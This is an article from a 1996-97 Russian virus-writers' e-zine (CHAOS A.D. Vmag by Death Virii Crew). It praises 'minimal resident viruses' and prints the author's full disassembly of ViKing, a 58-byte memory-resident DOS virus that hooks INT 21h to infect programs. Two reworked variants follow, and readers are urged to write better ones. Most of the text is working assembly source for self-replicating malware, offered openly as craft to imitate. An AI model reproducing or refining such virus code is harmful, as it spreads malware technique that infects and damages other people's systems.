[Death Virii Crew] Presents
CHAOS A.D. Vmag, Issue 3, Autumn 1996 - Winter 1997


		    Минимальные резидентные вирусы.


 Очень часто сия тема поднимается везде, где только можно, где нужно и не 
нужно. Тема минимального вируса. Масса народу утверждает, что написали 
самый маленький вирус в мире и так далее и тому подобное. Я лично не встречал
еще вируса минимальней, оптимальней и красивей чем тот который я сегодня 
представлю на ваше рассмотрение. Это ViKing. 58 байт. RC. Я слышал, что его
автор написал что-то еще меньшее, но пока не видел. И тем не менее перед вами
мой дизасм этого вируса и парочка моих ремейков (единственные мои ремейки).
Смотрите, наслаждайтесь качеством кода и пишите лучше... 

;----------------------------------------------------------------------------
;[ViKing58]

.286
.model tiny
.code
org 100h
start:
cli
scasw
pusha
mov al,25h
mov bl,84h-len
mov es,ax
mov cl,len
rep movsb
pop ds
xchg ax,[bx+di]
cmp al,int_21
je quit
stosw
mov ax,es
xchg ax,[bx+di]
stosw
quit:
push cs
pop es
push cs
pop ds
pop di
sub cx,si
rep movsb
db 0ebh
db -crazy
crazy equ $-start

int_21 equ $-start
pusha
mov si,dx
lodsb
cmp ax,40e9h
jne fuck
push ds
push cs
pop ds
cwd
mov cx,len
int 21h
pop ds
fuck:
popa
db 0eah
len equ $-start
int 20h
end start
;----------------------------------------------------------------------------

;[ViKing58] Remake by Reminder (Correct work with stack)

.286
.model tiny
.code
org 100h
start:
cli
scasw
push si
push ax
mov al,int_21
mov bl,84h-len
mov es,ax
mov cl,len
rep movsb
pop ds
xchg ax,[bx+di]
cmp al,int_21
je quit
stosw
mov ax,es
xchg ax,[bx+di]
stosw
quit:
push cs
pop es
push cs
pop ds
pop di
sub cx,si
rep movsb
db 0ebh
db -crazy
crazy equ $-start

int_21 equ $-start
pusha
mov si,dx
lodsb
cmp ax,40e9h
jne fuck
push ds
push cs
pop ds
cwd
mov cx,len
int 21h
pop ds
fuck:
popa
db 0eah
len equ $-start
ret
end start
;----------------------------------------------------------------------------

;[ViKing58] Remake by Reminder  (Correct work with interrupts)

.286
.model tiny
.code
org 100h
start:
cli
scasw
push si
db 06ah,60h
pop es
mov bl,84h-len
mov cl,len
rep movsb
mov ds,ax
mov al,int_21
xchg ax,[bx+di]
cmp al,int_21
je quit
stosw
mov ax,es
xchg ax,[bx+di]
stosw
quit:
push cs
pop ds
push cs
pop es
pop di
sub cx,si
rep movsb
db 0ebh
db -crazy
crazy equ $-start

int_21 equ $-start
pusha
mov si,dx
lodsb
cmp ax,40e9h
jne fuck
push ds
push cs
pop ds
cwd
mov cx,len
int 21h
pop ds
fuck:
popa
db 0eah
len equ $-start
ret
end start
;----------------------------------------------------------------------------

После того, как были написаны эти строки и собственно дизасм я смог найти
самого автора этого вируса и он любезно презентовал мне авторские исходники с
краткой документацией, каковые и представлены на ваше рассмотрение в
этом же каталоге.

						   (c) by Reminder [DVC]
